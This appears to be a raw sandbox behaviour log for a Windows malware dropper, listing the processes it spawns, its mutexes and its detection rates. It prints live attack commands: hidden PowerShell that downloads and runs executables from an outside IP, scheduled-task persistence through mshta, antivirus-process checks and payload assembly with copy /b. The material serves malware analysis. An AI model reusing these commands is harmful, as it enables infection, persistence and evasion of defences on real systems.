Code function: 8_2_00F8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

8_2_00F8648E

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

8_2_00F142A2

Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE

Code function: 23_2_050A15D8 ChangeServiceConfigA,

23_2_050A15D8

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:944:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DhqvS8pXj8.exe	ReversingLabs: Detection: 59%
Source: DhqvS8pXj8.exe	Virustotal: Detection: 47%

Source: DhqvS8pXj8.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

File read: C:\Users\user\Desktop\DhqvS8pXj8.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DhqvS8pXj8.exe "C:\Users\user\Desktop\DhqvS8pXj8.exe"
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE "C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe "C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe"
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "j1HKkma32Vn" /tr "mshta \"C:\Temp\v468GkyBl.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\v468GkyBl.hta"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\v468GkyBl.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe "C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE "C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: unknown	Process created: C:\ProgramData\jhbbvnx\fbpbh.exe C:\ProgramData\jhbbvnx\fbpbh.exe
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe "C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe "C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE "C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "j1HKkma32Vn" /tr "mshta \"C:\Temp\v468GkyBl.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\v468GkyBl.hta"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
